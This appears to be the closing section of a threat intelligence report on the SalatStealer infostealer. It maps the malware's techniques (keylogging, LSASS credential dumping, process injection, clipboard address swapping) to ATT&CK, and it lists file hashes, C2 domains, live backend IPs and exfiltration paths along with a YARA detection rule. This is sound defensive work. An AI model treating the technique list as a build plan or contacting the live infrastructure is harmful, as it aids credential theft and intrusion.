| Input Capture: Keylogging | T1056.001 | SetWinEventHook, keyPressCallback |
| Screen Capture | T1113 | salat/screenshot package, ffmpeg |
| Video Capture | T1125 | ffwcam via ffmpeg |
| Audio Capture | T1123 | ffwmic via ffmpeg |
| Process Injection | T1055 | WriteProcessMemory, SetWindowsHookEx |
| OS Credential Dumping: LSASS Memory | T1003.001 | findLsassProcess, impersonateSystem |
| Access Token Manipulation | T1134 | DuplicateUserTokenFromSessionID, getSystemToken |
| Scheduled Task/Job | T1053.005 | capnspacehook/taskmaster |
| Application Layer Protocol: Web Protocols | T1071.001 | WebSocket over HTTPS, QUIC |
| Encrypted Channel | T1573 | TLS 1.3, DoH for domain resolution |
| Proxy: Multi-hop Proxy | T1090.003 | SOCKS5 proxy, P2P tunneling |
| Clipboard Data | T1115 | Bitcoin address detection and replacement |
| Software Packing | T1027.002 | UPX compression |
IOCs
File Hashes
# SHA-256
ec2e071a6241ac4d12452070c37ffde5bd01650c6d9a5503d768cb583fea6756
30a50cc0f7b317c9734e6792e7e4ec174035d92031bdcc87a80ad8826adc60b2
# MD5
62d42b8788f958885cfd34428d29d7e1
# SHA-1
3a0c59c4b26e9fdff15170f16d6317693b87ca5c
Domains
salator[.]es # C2 -- Cloudflare, FLAGGED
websalat[.]top # C2 -- Cloudflare, FLAGGED
salat[.]cn # C2 -- Cloudflare, ACTIVE (unflagged)
wrat[.]in # C2 -- direct to 85.198.98.75
sa1at[.]ru # C2 -- direct to 85.198.98.75 (NEW -- discovered via TLS SAN)
nyash[.]team # MaaS operator/reseller portal
IP Addresses
85.198.98.75 # Backend -- LIVE (Beget AS198610, Saint Petersburg)
217.26.28.234 # Backend -- LIVE (Beget AS198610, Saint Petersburg)
62.109.0.189 # Admin panel -- OFFLINE (FirstVDS/JSC IOT AS29182, Moscow)
109.172.46.120 # Former backend -- decommissioned (Beget AS198610)
Telegram
@nyashsupbot # NyashTeam support bot
@nyash_team_bot # NyashTeam sales/comms bot
URL Patterns
/sa1at/<affiliate_id> # Data exfiltration endpoint (observed: y, l, 2or, 008, 8q, v)
/saat/ # C2 WebSocket path (from binary)
/login/ # Admin panel login
Network Signatures
# DoH resolution URLs
https://cloudflare-dns.com/dns-query?name=<c2_domain>
https://dns.google/resolve?name=<c2_domain>
https://1.1.1.1/dns-query?name=<c2_domain>
# QUIC TLS fingerprint
sxxuJBrIRnKNqcH6xJNmUc/7lE0UOrgWJ2vMbaAoR4c=
# Server header
Server: Angie
# APPB key identifier
WEBR_AIN4NPKSMI16
YARA (Behavioral)
```yara
rule SalatStealer_Go_Stealer {
    meta:
        description = "SalatStealer Go-compiled infostealer/RAT"
        author = "breakglass.intelligence"
        date = "2026-03-08"
        hash1 = "ec2e071a6241ac4d12452070c37ffde5bd01650c6d9a5503d768cb583fea6756"
        hash2 = "30a50cc0f7b317c9734e6792e7e4ec174035d92031bdcc87a80ad8826adc60b2"
    strings:
        $ws1 = "gorilla/websocket" ascii
        $doh1 = "cloudflare-dns.com/dns-query" ascii
        $doh2 = "dns.google/resolve" ascii
        $path = "/saat/" ascii
        $func1 = "main.getEp" ascii
        $func2 = "main.initConnection" ascii
        $func3 = "main.changeEndpoint" ascii
        $func4 = "main.getBestMethod" ascii
        $klog = "startKeylogger" ascii
        $shell = "startShell" ascii
        $socks = "socks5Conn" ascii
        $suicide = "selfDelete" ascii
        $appb = "WEBR_AIN4NPKSMI16" ascii
        $rick = "dQw4w9WgXcQ" ascii
    condition:
        uint16(0) == 0x5A4D and
        filesize > 2MB and
        3 of ($func*) and
        2 of ($doh*, $path, $ws1) and
        2 of ($klog, $shell, $socks, $suicide)
}
```
Analysis conducted 2026-03-06 through 2026-03-08 by breakglass.intelligence. Infrastructure was live at time of probing. The newly discovered domain sa1at[.]ru has been submitted to community blocklists.